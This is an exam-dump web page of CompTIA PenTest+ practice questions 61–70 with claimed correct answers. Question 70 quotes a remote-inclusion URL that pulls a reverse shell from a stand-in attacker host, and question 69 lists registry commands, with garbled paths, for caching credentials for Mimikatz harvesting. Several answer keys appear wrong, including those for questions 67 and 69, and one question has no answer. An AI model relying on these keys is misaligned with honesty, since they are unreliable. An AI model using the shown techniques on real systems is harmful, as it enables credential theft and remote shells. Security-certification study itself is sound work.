Enjoy 15% Discount With Coupon 15off

CompTIA PT0-001 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-001 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-001 Online Training

The questions for PT0-001 were last updated at Jan 07,2025.
  • Exam Code: PT0-001
  • Exam Name: CompTIA PenTest+ Certification Exam
  • Certification Provider: CompTIA
  • Latest update: Jan 07,2025
Question #61

A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

• Code review

• Updates to firewall setting

  • A . Scope creep
  • B . Post-mortem review
  • C . Risk acceptance
  • D . Threat prevention

Reveal Solution Hide Solution

Correct Answer: D
Question #62

Which of the following BEST describes why an MSA is helpful?

  • A . It contractually binds both parties to not disclose vulnerabilities.
  • B . It reduces potential for scope creep.
  • C . It clarifies the business arrangement by agreeing to specific terms.
  • D . It defines the timelines for the penetration test.

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Reference: https://ironcladapp.com/journal/contracts/what-is-an-msa/#:~:text=MSAs%20are%20useful%20because%20they,foundation%20for%20all%20f uture%20actions
Question #63

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

  • A . Shodan
  • B . SET
  • C . BeEF
  • D . Wireshark
  • E . Maltego
  • F . Dynamo

Reveal Solution Hide Solution

Correct Answer: A,E
A,E

Explanation:

References: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/#gref
Question #64

DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Reveal Solution Hide Solution

Correct Answer:


Question #65

A penetration tester is performing a code review .

Which of the following testing techniques is being performed?

  • A . Dynamic analysis
  • B . Fuzzing analysis
  • C . Static analysis
  • D . Run-time analysis

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Reference: https://smartbear.com/learn/code-review/what-is-code-review/
Question #66

An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.

Which of the following attack vectors would the attacker MOST likely use?

  • A . Capture a three-way handshake and crack it
  • B . Capture a mobile device and crack its encryption
  • C . Create a rogue wireless access point
  • D . Capture a four-way handshake and crack it

Reveal Solution Hide Solution

Correct Answer: D
Question #67

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .

Which of the following steps must the firm take before it can run a static code analyzer?

  • A . Run the application through a dynamic code analyzer.
  • B . Employ a fuzzing utility.
  • C . Decompile the application.
  • D . Check memory allocations.

Reveal Solution Hide Solution

Correct Answer: D
Question #68

Given the following Python code:

a = ‘abcdefghijklmnop’

a[::2]

Which of the following will result?

  • A . adgjmp
  • B . pnlhfdb
  • C . acegikmo
  • D . ab

Reveal Solution Hide Solution

Correct Answer: C
C

Explanation:

Reference: https://blog.finxter.com/python-double-colon/
Question #69

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.

Which of the following registry changes would allow for credential caching in memory?

  • A . reg add HKLMSystemControlSet002ControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 0
  • B . reg add HKCUSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1
  • C . reg add HKLMSoftwareCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1
  • D . reg add HKLMSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1

Reveal Solution Hide Solution

Correct Answer: A
Question #70

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

  • A . Implement a blacklist.
  • B . Block URL redirections.
  • C . Double URL encode the parameters.
  • D . Stop external calls from the application.

Reveal Solution Hide Solution

Correct Answer: B
Previous Questions Next Questions
Latest PT0-001 Dumps Valid Version with 248 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Instant Download PT0-001 PDF
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related Posts

19Nov

CompTIA CV0-003 CompTIA Cloud+ Certification Exam Online Training

Question #1 A company has decided to scale its e-commerce application from its corporate datacenter to a commercial cloud provider to... read more

14Aug

CompTIA PK0-005 CompTIA Project+Certification Online Training

Question #1 A PM has identified all the resources involved in a project. The next step is to identify which resources... read more

16Oct

CompTIA CLO-001 CompTIA Cloud Essentials Exam Online Training

Question #1 Digital identities for logging onto SaaS solutions should be issued by all the following EXCEPT: A . A third-party identity... read more

10Sep

CompTIA SK0-005 CompTIA Server+ Certification Exam Online Training

Question #1 Which of the following is typical of software licensing in the cloud? A . Per socketB . PerpetualC . Subscription-basedD... read more

26Oct

CompTIA XK0-004 CompTIA Linux+ Certification Exam Online Training

Question #1 Which of the following is the purpose of the vmlinux file on a Linux system? A . To prevent a... read more

07Sep

CompTIA 220-1102 CompTIA A+ Certification Core 2 Exam Online Training

Question #1 A user contacts a technician about an issue with a laptop. The user states applications open without being launched... read more

30May

CompTIA XK0-005 CompTIA Linux+ Exam Online Training

Question #1 An administrator accidentally deleted the /boot/vmlinuz file and must resolve the issue before the server is rebooted. Which of... read more

13Aug

CompTIA 220-1101 CompTIA A+ Certification Exam: Core 1 Online Training

Question #1 A user sends a print job lo a network printer, and the print job uses double the amount of... read more

04Oct

CompTIA CS0-001 CompTIA CySA+ Certification Exam Online Training

Question #1 A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS... read more

13Oct

CompTIA PK0-004 CompTIA Project + Online Training

Question #1 A project manager is attempting to establish the proper sequencing and duration of project activities. Which of the following... read more